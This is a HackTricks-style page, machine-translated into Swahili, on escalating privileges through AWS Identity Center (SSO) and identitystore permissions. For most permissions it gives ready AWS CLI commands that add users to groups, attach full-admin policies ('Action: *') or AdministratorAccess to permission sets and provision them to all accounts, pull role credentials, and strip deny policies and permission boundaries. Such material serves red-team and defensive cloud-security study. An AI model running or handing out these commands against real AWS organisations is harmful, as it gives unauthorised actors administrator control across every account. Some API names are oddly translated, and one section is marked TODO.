AWS - SSO & identitystore Privesc

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Kituo cha Utambulisho cha AWS / AWS SSO

Kwa habari zaidi kuhusu Kituo cha Utambulisho cha AWS / AWS SSO angalia:

pageAWS - IAM, Identity Center & SSO Enum

Tambua kwamba kwa chaguo-msingi, ni watumiaji tu wenye ruhusa kutoka kwenye Akaunti ya Usimamizi ndio wataweza kufikia na kudhibiti Kituo cha Utambulisho cha IAM. Watumiaji kutoka akaunti zingine wanaweza kuruhusiwa ikiwa akaunti hiyo ni Msimamizi aliyeidhinishwa. Angalia nyaraka kwa maelezo zaidi.

Rudisha Nenosiri

Njia rahisi ya kuinua viwango vya ruhusa katika hali kama hii ni kuwa na ruhusa inayoruhusu kurejesha nywila za watumiaji. Kwa bahati mbaya ni tuwezekana kutuma barua pepe kwa mtumiaji ili arudishe nenosiri lake, hivyo utahitaji ufikiaji wa barua pepe ya mtumiaji.

identitystore:CreateGroupMembership

Kwa ruhusa hii, ni rahisi kuweka mtumiaji ndani ya kikundi ili apate kurithi ruhusa zote ambazo kikundi kinazo.

aws identitystore create-group-membership --identity-store-id <tore-id> --group-id <group-id> --member-id UserId=<user-id>

sso:WekaSeraMojaKwaSetiYaRuhusa, sso:ToaRuhusaYaUtoaji

Mshambuliaji mwenye idhini hii anaweza kutoa ruhusa za ziada kwa Seti ya Ruhusa ambayo imeruhusiwa kwa mtumiaji chini ya udhibiti wake

# Set an inline policy with admin privileges
aws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.yaml

# Content of /tmp/policy.yaml
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Statement1",
"Effect": "Allow",
"Action": ["*"],
"Resource": ["*"]
}
]
}

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:AttachManagedPolicyToPermissionSet, sso:ProvisionPermissionSet

Mshambuliaji mwenye ruhusa hii anaweza kutoa ruhusa za ziada kwa Seti ya Ruhusa ambayo imeruhusiwa kwa mtumiaji chini ya udhibiti wake

# Set AdministratorAccess policy to the permission set
aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:AttachCustomerManagedPolicyReferenceToPermissionSet, sso:ProvisionPermissionSet

Mshambuliaji mwenye ruhusa hii anaweza kutoa ruhusa za ziada kwa Seti ya Ruhusa ambayo imeruhusiwa kwa mtumiaji chini ya udhibiti wake.

Kutumia ruhusa hizi katika kesi hii unahitaji kujua jina la sera iliyosimamiwa na mteja ambayo iko NDANI YA akaunti ZOTE zitakazoathiriwa.

# Set AdministratorAccess policy to the permission set
aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference <customer-managed-policy-name>

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:GetRoleCredentials

Inarudisha sifa za muda mfupi za STS kwa jina la jukumu lililopewa mtumiaji.

aws sso get-role-credentials --role-name <value> --account-id <value> --access-token <value>

Walakini, unahitaji tokeni ya ufikiaji ambayo siyo hakika jinsi ya kuipata (TODO).

sso:DetachManagedPolicyFromPermissionSet

Mshambuliaji mwenye ruhusa hii anaweza kuondoa uhusiano kati ya sera iliyoandaliwa na AWS kutoka kwenye seti ya ruhusa iliyotajwa. Inawezekana kutoa mamlaka zaidi kupitia kuondoa sera iliyoandaliwa (sera ya kukataa).

aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>

sso:DetachCustomerManagedPolicyReferenceFromPermissionSet

Mshambuliaji mwenye ruhusa hii anaweza kuondoa uhusiano kati ya sera iliyosimamiwa na mteja kutoka kwa seti ya ruhusa iliyotajwa. Inawezekana kutoa ruhusa zaidi kupitia kuondoa sera iliyosimamiwa (sera ya kukataa).

aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference <value>

sso:DeletePermissionBoundaryFromPermissionSet

Mshambuliaji mwenye ruhusa hii anaweza kuondoa Kizuizi cha Ruhusa kutoka kwa seti ya ruhusa. Inawezekana kutoa ruhusa zaidi kwa kuondoa vizuizi kwenye Seti ya Ruhusa iliyotolewa kutoka kwa Kizuizi cha Ruhusa.

aws sso-admin   delete-permissions-boundary-from-permission-set --instance-arn <value> --permission-set-arn <value>
Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Last updated